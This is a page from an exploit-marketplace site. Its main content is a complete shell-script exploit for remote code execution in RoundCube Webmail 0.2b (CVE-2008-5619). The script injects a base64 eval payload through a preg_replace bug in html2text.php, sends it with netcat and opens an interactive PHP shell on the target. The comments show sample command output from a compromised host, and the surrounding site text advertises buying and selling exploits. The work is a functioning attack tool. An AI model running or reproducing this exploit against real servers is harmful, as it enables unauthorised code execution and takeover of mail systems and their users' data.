0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
RoundCube Webmail <= 0.2b Remote Code Execution Exploit
[=======================================================
RoundCube Webmail <= 0.2b Remote Code Execution Exploit
=======================================================
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
echo 'Exploit for Roundcube Webmail =< 0.2-beta'
echo 'html2text.php / preg_replace() / eval bug'
echo -e '\r\nby Hunger \r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0 <hostname> <deeplink>
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] || [ "$BASE64ENC" = "" ];
then
echo "Required tool(s) missing... (netcat, base64)"
exit 2
fi
USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
MYPAYLOAD="{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}"
EVALEDTAG="<b>"
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG"</b>"
PARAMSIZE=54
HOST_NAME=$1
DEEP_LINK=$2
HTTP_PORT=80
HTTPHEADR=""
HTTPHEADR=$HTTPHEADR"POST $DEEP_LINK HTTP/1.0\r\n"
HTTPHEADR=$HTTPHEADR"Host: $HOST_NAME\r\n"
HTTPHEADR=$HTTPHEADR"User-Agent: $USERAGENT\r\n"
HTTPHEADR=$HTTPHEADR"Content-length: $PARAMSIZE\r\n"
HTTPHEADR=$HTTPHEADR"Accept:"
SPLOITCHK='Succeeded! :))'
PHPAYLOAD='echo("'
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK'\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Type PHP functions as shell commands. ;)\r\n'
PHPAYLOAD=$PHPAYLOAD'Use \"exit\" to close session.\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Good luck and have phun! ;D\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'")'
HTTPOKMSG="HTTP/1.0 200 OK"
HTTP1KMSG="HTTP/1.1 200 OK"
RETURNCHR=`echo -e "\r\n"`
echo -n "Trying to exploit... "
f=0; until [ "$PHPAYLOAD" = "exit" ]; do
PHPAYLOAD=`echo "$PHPAYLOAD;" |$BASE64ENC --wrap=0`
HTTP_SEND="$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG"
HTTP_BACK=`echo -ne "$HTTP_SEND"|$NETCATEXE $HOST_NAME $HTTP_PORT`
if [ $? != 0 ]; then echo "Connection failed."; exit 3; fi
e=0; l=0; echo "$HTTP_BACK" | while read i; do let l++;
if [ $l = 1 ] && [ "$i" != "$HTTPOKMSG$RETURNCHR" ] \
&& [ "$i" != "$HTTP1KMSG$RETURNCHR" ]; then
echo "Bad Server Response :\\"; exit 4; fi;
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" = "$MYPAYLOAD" ]; then
echo "Target has been patched /o\\"; exit 4; fi
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" != "$SPLOITCHK$RETURNCHR" ]; then
echo -e "Exploitation failed :(("; exit 4; elif
[ "$i" = "$SPLOITCHK$RETURNCHR" ]; then let f++; fi
if [ $e -gt 0 ]; then echo "$i"; fi
if [ "$i" = "$RETURNCHR" ]; then let e++; fi
done
if [ $? != 4 ]; then let f++; echo -ne "PHP> "; else
echo -e "\n\nDump:\n\n$HTTP_BACK"; exit 4; fi;
read PHPAYLOAD
done
# 0day.today [2024-11-15] #